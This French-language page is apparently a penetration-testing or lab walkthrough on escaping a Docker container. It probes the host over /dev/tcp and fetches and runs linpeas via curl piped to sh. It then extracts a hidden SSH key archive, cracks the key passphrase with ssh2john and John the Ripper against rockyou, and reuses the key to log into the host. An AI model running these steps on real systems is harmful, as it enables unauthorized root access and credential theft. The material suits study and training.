Docker Escape (ssh keys) - Linux Privilege Escalation

Nous observons que nous sommes dans un conteneur et utilisons la commande pour trouver l'adresse du conteneur réel (192.168.150.1). Ensuite, nous vérifions si le port 22 est ouvert sur cette machine.

echo '' > /dev/tcp/192.168.150.1/22

Énumération du Système (LINpeas):

Nous utilisons Linpeas pour la reconnaissance des privilèges:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Nous repérons un dossier tgz inattendu dans le répertoire racine.

cp /.oldkeys.tgz /tmp/
cd !$
mv .oldkeys.tgz oldkeys.tgz
tar -xf oldkeys.tgz

Crack de la Clé SSH Privée Protégée:

Identification de la clé SSH privée

Nous identifions une paire de clés SSH publique et privée OpenSSH.

Crackage de la clé privée:

Nous observons que la clé privée est chiffrée

Nous utilisons ssh2john.py pour convertir le contenu du fichier en un hash:

python2.7 /usr/share/john/ssh2john.py id_rsa

Ensuite, nous utilisons John the Ripper pour casser le hash avec un fichier de mots de passe.

john -w:/usr/share/wordlists/rockyou.txt hash

Accès en tant que root:

Nous obtenons l'accès à la machine en tant que root.

Abus de la Confiance des Paires de Clés SSH pour Échapper du Conteneur:

Nous tentons de migrer vers une autre machine en utilisant la configuration de known_hosts dans le répertoire ssh du conteneur, ce qui nous permet de nous connecter à l'utilisateur admin sur la machine hôte.

Mis à jour il y a 1 an

hashtagÉnumération du Système (LINpeasarrow-up-right):

hashtagNous repérons un dossier tgz inattendu dans le répertoire racine.

hashtagCrack de la Clé SSH Privée Protégée:

hashtagIdentification de la clé SSH privée

hashtagCrackage de la clé privée:

hashtagAccès en tant que root:

hashtagAbus de la Confiance des Paires de Clés SSH pour Échapper du Conteneur: